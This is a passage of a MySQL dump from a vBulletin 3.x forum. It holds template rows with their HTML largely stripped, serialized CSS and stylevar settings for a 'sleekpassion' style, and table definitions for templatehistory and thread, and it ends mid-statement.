\r\n\r\n
\r\n
\r\n\r\n \r\n $forminfo[hiddenfields]\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208876514, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1733, -1, 'sendtofriend', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[send_page_to_a_friend] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[send_page_to_a_friend] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208876471, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1734, -1, 'shell_blank', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$html\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$html\r\n\r\n$footer\r\n\r\n', 'template', 1195729840, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1735, -1, 'spacer_close', '\".(($show[\'old_explorer\']) ? (\"\r\n \r\n\") : (\"\r\n \r\n \r\n\r\n\")).\"\r\n', '\r\n \r\n \r\n \r\n \r\n\r\n \r\n', 'template', 1073266185, 'vBulletin Solutions', '', 'vbulletin'),
(1736, -1, 'spacer_open', '\r\n\".(($show[\'old_explorer\']) ? (\"\r\n \r\n\") : (\"\r\n\r\n
\r\n
\r\n\")).\"', '\r\n
\r\n \r\n \r\n\r\n
\r\n
\r\n', 'template', 1193831811, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1737, -1, 'STANDARD_ERROR', '$stylevar[htmldoctype]\r\n\r\n\r\n\".(($show[\'search_noindex\']) ? (\"
\") : (\"\")).\"\r\n$headinclude\r\n
$pagetitle \r\n$headinsert\r\n\r\n\r\n$header\r\n\".(($navbar) ? (\"\r\n$navbar\r\n\") : (\"\r\n
\r\n\")).\"\r\n\r\n
\r\n\r\n $vbphrase[vbulletin_message] \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n
\r\n\r\n\".((!$show[\'enableforumjump\']) ? (\"\r\n\r\n
\r\n\r\n $forumjump \r\n \r\n
\r\n\r\n\") : (\"\")).\"\r\n\r\n
\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n
\r\n$headinclude\r\n
$pagetitle \r\n$headinsert\r\n\r\n\r\n$header\r\n
\r\n$navbar\r\n \r\n \r\n \r\n\r\n
\r\n\r\n $vbphrase[vbulletin_message] \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n
\r\n\r\n
\r\n\r\n\r\n\r\n $forumjump \r\n \r\n
\r\n\r\n \r\n\r\n
\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208876170, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1738, -1, 'STANDARD_ERROR_LITE', '$stylevar[htmldoctype]\r\n\r\n\r\n
\r\n$headinclude\r\n
$pagetitle \r\n$headinsert\r\n\r\n\r\n\r\n
\r\n\r\n $vbphrase[vbulletin_message] \r\n \r\n\r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n
\r\n$headinclude\r\n
$pagetitle \r\n$headinsert\r\n\r\n\r\n\r\n
\r\n\r\n $vbphrase[vbulletin_message] \r\n \r\n\r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n', 'template', 1208876155, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1739, -1, 'STANDARD_ERROR_LOGIN', '$stylevar[htmldoctype]\r\n\r\n\r\n\".(($show[\'search_noindex\']) ? (\"
\") : (\"\")).\"\r\n$headinclude\r\n
$pagetitle \r\n$headinsert\r\n\r\n\r\n$header\r\n\r\n\r\n
\r\n\r\n
\r\n\r\n $vbphrase[vbulletin_message] \r\n \r\n\r\n \r\n \r\n \r\n \r\n
\r\n\r\n
\r\n\r\n\".((!$show[\'enableforumjump\']) ? (\"\r\n\r\n
\r\n\r\n $forumjump \r\n \r\n
\r\n\r\n\") : (\"\")).\"\r\n\r\n
\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n
\r\n$headinclude\r\n
$pagetitle \r\n$headinsert\r\n\r\n\r\n$header\r\n\r\n\r\n
\r\n\r\n
\r\n\r\n $vbphrase[vbulletin_message] \r\n \r\n\r\n \r\n \r\n \r\n \r\n
\r\n\r\n
\r\n\r\n
\r\n\r\n\r\n\r\n $forumjump \r\n \r\n
\r\n\r\n \r\n\r\n
\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208876137, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1740, -1, 'STANDARD_REDIRECT', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n
$pagetitle \r\n\r\n\r\n\r\n
\r\n
\r\n
\r\n
\r\n\r\n
\r\n\r\n\r\n $vbphrase[redirecting] \r\n \r\n\r\n \r\n \r\n \r\n \r\n
\r\n \r\n\r\n\".(($postvars) ? (\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\") : (\"\r\n\r\n
\r\n \r\n \r\n\r\n\r\n\r\n\")).\"\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n
$pagetitle \r\n\r\n\r\n\r\n
\r\n
\r\n
\r\n
\r\n\r\n
\r\n\r\n\r\n $vbphrase[redirecting] \r\n \r\n\r\n \r\n \r\n \r\n \r\n
\r\n \r\n\r\n
\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n', 'template', 1210330703, 'vBulletin Solutions', '3.7.1', 'vbulletin'),
(1741, 2, '.alt1, .alt1Active', 'a:7:{s:10:\"background\";s:7:\"#F1F1F1\";s:5:\"color\";s:7:\"#455867\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:55:\"border-top:1px solid #FFF;\r\nborder-left:1px solid #FFF;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1236982758, 'unenergizer', '', 'vbulletin'),
(1742, 2, '.alt2, .alt2Active', 'a:7:{s:10:\"background\";s:7:\"#F1F1F1\";s:5:\"color\";s:7:\"#455867\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:55:\"border-top:1px solid #FFF;\r\nborder-left:1px solid #FFF;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1236982758, 'unenergizer', '', 'vbulletin'),
(1743, 2, '.fjsel', 'a:2:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";}', '', 'css', 1203620154, 'littlewhitelines', '', 'vbulletin'),
(1744, 2, '.inlinemod', 'a:7:{s:10:\"background\";s:7:\"#FFFFCC\";s:5:\"color\";s:7:\"#455867\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1236984323, 'unenergizer', '', 'vbulletin'),
(1745, 2, '.page', 'a:7:{s:10:\"background\";s:7:\"#FFFFFF\";s:5:\"color\";s:7:\"#455867\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1236982224, 'unenergizer', '', 'vbulletin'),
(1746, 2, '.panel', 'a:7:{s:10:\"background\";s:79:\"#E4E7F5 url(images/sleekpassion/gradients/gradient_panel.gif) repeat-x top left\";s:5:\"color\";s:7:\"#455867\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:35:\"padding: 10px;\r\nborder: 2px outset;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1236984323, 'unenergizer', '', 'vbulletin'),
(1747, 2, '.panelsurround', 'a:4:{s:10:\"background\";s:87:\"#D1D4E0 url(images/sleekpassion/gradients/gradient_panelsurround.gif) repeat-x top left\";s:5:\"color\";s:7:\"#455867\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:0:\"\";}', '', 'css', 1236984323, 'unenergizer', '', 'vbulletin'),
(1748, 2, '.tborder', 'a:4:{s:10:\"background\";s:7:\"#D9D9D9\";s:5:\"color\";s:7:\"#455867\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:25:\"border:1px solid #D9D9D9;\";}', '', 'css', 1236982224, 'unenergizer', '', 'vbulletin'),
(1749, 2, '.tcat', 'a:7:{s:10:\"background\";s:78:\"#26607D url(images/sleekpassion/gradients/gradient_tcat.gif) repeat-x top left\";s:5:\"color\";s:7:\"#EDEFF4\";s:4:\"font\";a:3:{s:5:\"style\";s:4:\"bold\";s:4:\"size\";s:4:\"10pt\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#ffffff\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#ffffff\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E16C04\";s:15:\"text-decoration\";s:9:\"underline\";}}', '', 'css', 1236984323, 'unenergizer', '', 'vbulletin'),
(1750, 2, '.tfoot', 'a:7:{s:10:\"background\";s:7:\"#204252\";s:5:\"color\";s:7:\"#EDEFF4\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#EDEFF4\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E0E0F6\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E16C04\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1236984323, 'unenergizer', '', 'vbulletin'),
(1751, 2, '.thead', 'a:7:{s:10:\"background\";s:79:\"#EFEFEF url(images/sleekpassion/gradients/gradient_thead.gif) repeat-x top left\";s:5:\"color\";s:7:\"#4C6072\";s:4:\"font\";a:3:{s:5:\"style\";s:4:\"bold\";s:4:\"size\";s:4:\"11px\";s:6:\"family\";s:78:\"tahoma, verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#4C6072\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#4C6072\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E16C04\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1236982758, 'unenergizer', '', 'vbulletin'),
(1752, 2, '.vbmenu_control', 'a:7:{s:10:\"background\";s:79:\"#EFEFEF url(images/sleekpassion/gradients/gradient_thead.gif) repeat-x top left\";s:5:\"color\";s:7:\"#4C6072\";s:4:\"font\";a:3:{s:5:\"style\";s:4:\"bold\";s:4:\"size\";s:4:\"11px\";s:6:\"family\";s:78:\"tahoma, verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:47:\"padding: 3px 6px 3px 6px;\r\nwhite-space: nowrap;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#4C6072\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#4C6072\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E16C04\";s:15:\"text-decoration\";s:9:\"underline\";}}', '', 'css', 1236984323, 'unenergizer', '', 'vbulletin'),
(1753, 2, '.vbmenu_hilite', 'a:7:{s:10:\"background\";s:8:\"#245A75 \";s:5:\"color\";s:7:\"#E16C04\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:4:\"11px\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:38:\"white-space: nowrap;\r\ncursor: pointer;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E16C04\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E16C04\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E16C04\";s:15:\"text-decoration\";s:4:\"none\";}}', '', 'css', 1236984508, 'unenergizer', '', 'vbulletin'),
(1754, 2, '.vbmenu_option', 'a:7:{s:10:\"background\";s:7:\"#F1F1F1\";s:5:\"color\";s:7:\"#455867\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:4:\"11px\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:38:\"white-space: nowrap;\r\ncursor: pointer;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#455867\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#455867\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#455867\";s:15:\"text-decoration\";s:4:\"none\";}}', '', 'css', 1236984459, 'unenergizer', '', 'vbulletin'),
(1755, 2, '.vbmenu_popup', 'a:4:{s:10:\"background\";s:7:\"#D9D9D9\";s:5:\"color\";s:7:\"#455867\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:25:\"border:1px solid #D9D9D9;\";}', '', 'css', 1236984323, 'unenergizer', '', 'vbulletin'),
(1756, 2, '.wysiwyg', 'a:7:{s:10:\"background\";s:7:\"#F5F5FF\";s:5:\"color\";s:7:\"#455867\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:4:\"10pt\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:42:\"margin: 5px 10px 10px 10px;\r\npadding: 0px;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#4C6072\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#4C6072\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E16C04\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1236984323, 'unenergizer', '', 'vbulletin'),
(1757, 2, 'body', 'a:7:{s:10:\"background\";s:7:\"#134A5E\";s:5:\"color\";s:7:\"#235167\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:4:\"10pt\";s:6:\"family\";s:70:\"verdana, geneva, lucida, \'lucida grande\', arial, helvetica, sans-serif\";}s:5:\"EXTRA\";s:27:\"margin: 0px;\r\npadding: 0px;\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#4C6072\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#4C6072\";s:15:\"text-decoration\";s:4:\"none\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:7:\"#E16C04\";s:15:\"text-decoration\";s:9:\"underline\";}}', '', 'css', 1425037126, 'opensc', '', 'vbulletin'),
(1758, 2, 'EXTRA2', 'a:1:{s:3:\"all\";s:391:\".sitenav {\r\nbackground:#235167 url(images/sleekpassion/gradients/nav_x.gif) repeat-x top left;\r\n}\r\n\r\n.pagebg {\r\nbackground:#FFF url(images/sleekpassion/gradients/page_bg.gif) repeat-x top left;\r\n}\r\n\r\n.leftside {\r\nbackground:#235167 url(images/sleekpassion/gradients/page_ls.gif) repeat top;\r\n}\r\n\r\n.rightside {\r\nbackground:#235167 url(images/sleekpassion/gradients/page_rs.gif) repeat top;\r\n}\";}', '', 'css', 1236982224, 'unenergizer', '', 'vbulletin'),
(1759, 2, 'td.inlinemod', 'a:7:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:4:\"font\";a:3:{s:5:\"style\";s:0:\"\";s:4:\"size\";s:0:\"\";s:6:\"family\";s:0:\"\";}s:5:\"EXTRA\";s:0:\"\";s:6:\"LINK_N\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_V\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}s:6:\"LINK_M\";a:3:{s:10:\"background\";s:0:\"\";s:5:\"color\";s:0:\"\";s:15:\"text-decoration\";s:0:\"\";}}', '', 'css', 1203620154, 'littlewhitelines', '', 'vbulletin'),
(1760, 2, 'imgdir_attach', 'images/sleekpassion/attach', '', 'stylevar', 1205099838, 'Hoxxy', '', 'vbulletin'),
(1761, 2, 'imgdir_button', 'images/sleekpassion/buttons', '', 'stylevar', 1205099838, 'Hoxxy', '', 'vbulletin'),
(1762, 2, 'imgdir_editor', 'images/sleekpassion/editor', '', 'stylevar', 1205099838, 'Hoxxy', '', 'vbulletin'),
(1763, 2, 'imgdir_misc', 'images/sleekpassion/misc', '', 'stylevar', 1205099838, 'Hoxxy', '', 'vbulletin'),
(1764, 2, 'imgdir_poll', 'images/sleekpassion/polls', '', 'stylevar', 1205099838, 'Hoxxy', '', 'vbulletin'),
(1765, 2, 'imgdir_rating', 'images/sleekpassion/rating', '', 'stylevar', 1205099838, 'Hoxxy', '', 'vbulletin'),
(1766, 2, 'imgdir_reputation', 'images/sleekpassion/reputation', '', 'stylevar', 1205099838, 'Hoxxy', '', 'vbulletin'),
(1767, 2, 'imgdir_statusicon', 'images/sleekpassion/statusicon', '', 'stylevar', 1205099838, 'Hoxxy', '', 'vbulletin'),
(1768, 2, 'outertablewidth', '770', '', 'stylevar', 1236742732, 'unenergizer', '', 'vbulletin'),
(1769, 2, 'titleimage', '', '', 'stylevar', 1420399737, 'admin', '', 'vbulletin'),
(1770, 2, 'forumhome_forumbit_level2_post', '
\r\n \r\n \r\n \r\n \".(($show[\'forumdescription\']) ? (\"$forum[description]
\") : (\"\")).\"\r\n \".(($show[\'forumsubscription\']) ? (\"\") : (\"\")).\"\r\n \".(($show[\'subforums\']) ? (\"$vbphrase[subforums] : $forum[subforums]
\") : (\"\")).\"\r\n \r\n $forum[lastpostinfo] \r\n $forum[threadcount] \r\n $forum[replycount] \r\n \".(($GLOBALS[\'vbulletin\']->options[\'showmoderatorcolumn\']) ? (\"\r\n $forum[moderators]
\r\n \") : (\"\")).\"\r\n \r\n$childforumbits', '
\r\n \r\n \r\n \r\n $forum[description]
\r\n \r\n $vbphrase[subforums] : $forum[subforums]
\r\n \r\n $forum[lastpostinfo] \r\n $forum[threadcount] \r\n $forum[replycount] \r\n \r\n $forum[moderators]
\r\n \r\n \r\n$childforumbits', 'template', 1219054346, 'Hoxxy', '3.7.2', 'vbulletin'),
(1779, -1, 'modifyoptions_vbtwitter', '
\r\n $vbphrase[twitter_vb] \r\n \r\n \r\n $vbphrase[twitter_integration] \r\n \r\n
\r\n ', '
\r\n $vbphrase[twitter_vb] \r\n \r\n \r\n $vbphrase[twitter_integration] \r\n \r\n
\r\n ', 'template', 1247609295, 'Jeremy', '1.0.3', 'kk_vbtwitter'),
(1919, 2, 'footer', '$ad_location[ad_footer_start]\r\n\r\n
\r\n
$vbphrase[all_times_are_gmt_x_time_now_is_y]
\r\n
\r\n\r\n$spacer_close\r\n\r\n\r\n
options[\'forumhome\'] . \".php\\\" method=\\\"get\\\" style=\\\"clear:$stylevar[left]\\\">\r\n\r\n\r\n\r\n \r\n\r\n \r\n \r\n Powered by:
xPRJ \r\n $vbphrase[powered_by_vbulletin]\r\n \r\n
\r\n\r\n \r\n \r\n $cronimage\r\n \r\n\r\n \" . $GLOBALS[\'vbulletin\']->options[\'copyrighttext\'] . \"\r\n
\r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n\r\n \".(($show[\'quickchooser\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'languagechooser\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n
\r\n\r\n \r\n\r\n$ad_location[ad_footer_end]\r\n\r\n\".(($show[\'dst_correction\']) ? (\"\r\n\r\n
\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n\r\n\") : (\"\")).\"\r\n
\r\n', '$ad_location[ad_footer_start]\r\n\r\n
\r\n
$vbphrase[all_times_are_gmt_x_time_now_is_y]
\r\n
\r\n\r\n$spacer_close\r\n\r\n\r\n
\r\n\r\n\r\n\r\n \r\n\r\n \r\n \r\n Powered by:
xPRJ \r\n $vbphrase[powered_by_vbulletin]\r\n \r\n
\r\n\r\n \r\n \r\n $cronimage\r\n \r\n\r\n $vboptions[copyrighttext]\r\n
\r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n$ad_location[ad_footer_end]\r\n\r\n
\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n
\r\n', 'template', 1456238871, 'admin', '3.8.7', 'vbulletin'),
(1920, 2, 'header', '\r\n
\r\n
\r\n \r\n
\r\n
\r\n\r\n\r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n\r\n \r\n \r\n
\r\n\r\n$spacer_open\r\n\r\n$_phpinclude_output\r\n\r\n$ad_location[ad_header_end]', '\r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n\r\n\r\n \r\n \r\n
\r\n\r\n$spacer_open\r\n\r\n$_phpinclude_output\r\n\r\n$ad_location[ad_header_end]', 'template', 1457521108, 'admin', '3.8.7', 'vbulletin'),
(1922, 2, 'headinclude', ' \r\n options[\'templateversion\'] . \"\\\" />\r\n \r\n\".(($show[\'threadinfo\']) ? (\"\r\n options[\'keywords\'] . \"\\\" />\r\n 1) ? (\"\" . construct_phrase(\"$vbphrase[page_x]\", \"$pagenumber\") . \"-\") : (\"\")).\"$threadinfo[prefix_plain_html] $threadinfo[title] $foruminfo[title_clean]\\\" />\r\n\") : (\"\".(($show[\'foruminfo\']) ? (\"\r\n options[\'keywords\'] . \"\\\" />\r\n 1) ? (\"\" . construct_phrase(\"$vbphrase[page_x]\", \"$pagenumber\") . \"-\") : (\"\")).\"$foruminfo[description_clean]\\\" />\r\n\") : (\"\r\n options[\'keywords\'] . \"\\\" />\r\n options[\'description\'] . \"\\\" />\r\n\")).\"\")).\"\r\n\r\n\r\n$style[css]\r\n\".((is_browser(\'opera\') AND !is_browser(\'opera\', \'8.0.1\')) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\".(($show[\'editor_css\']) ? (\"\r\n$editor_css\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\".(($show[\'popups\']) ? (\"\") : (\"\")).\"\r\n\r\n\".(($GLOBALS[\'vbulletin\']->options[\'externalrss\']) ? (\"\r\n options[\'bbtitle\'] . \" RSS Feed\\\" href=\\\"external.php?type=RSS2\\\" />\r\n \".(($show[\'foruminfo\'] OR $show[\'threadinfo\']) ? (\"\r\n options[\'bbtitle\'] . \" - $foruminfo[title_clean] - RSS Feed\\\" href=\\\"external.php?type=RSS2&forumids=$foruminfo[forumid]\\\" />\r\n \") : (\"\")).\"\r\n\") : (\"\")).\"', ' \r\n \r\n \r\n\r\n $threadinfo[taglist], $threadinfo[prefix_plain_html] $threadinfo[title], $vboptions[keywords]\" />\r\n 1\">$vbphrase[page_x] -$threadinfo[prefix_plain_html] $threadinfo[title] $foruminfo[title_clean]\" />\r\n\r\n \r\n 1\">$vbphrase[page_x] - $foruminfo[description_clean]\" />\r\n \r\n \r\n \r\n\r\n\r\n\r\n$style[css]\r\n\r\n\r\n \r\n\r\n$editor_css\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n ', 'template', 1457626032, 'admin', '3.8.7', 'vbulletin');
DROP TABLE IF EXISTS `templatehistory`;
CREATE TABLE `templatehistory` (
`templatehistoryid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`styleid` smallint(5) unsigned NOT NULL DEFAULT '0',
`title` varchar(100) NOT NULL DEFAULT '',
`template` mediumtext,
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`username` varchar(100) NOT NULL DEFAULT '',
`version` varchar(30) NOT NULL DEFAULT '',
`comment` varchar(255) NOT NULL DEFAULT '',
PRIMARY KEY (`templatehistoryid`),
KEY `title` (`title`,`styleid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `thread`;
CREATE TABLE `thread` (
`threadid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`title` varchar(250) NOT NULL DEFAULT '',
`prefixid` varchar(25) NOT NULL DEFAULT '',
`firstpostid` int(10) unsigned NOT NULL DEFAULT '0',
`lastpostid` int(10) unsigned NOT NULL DEFAULT '0',
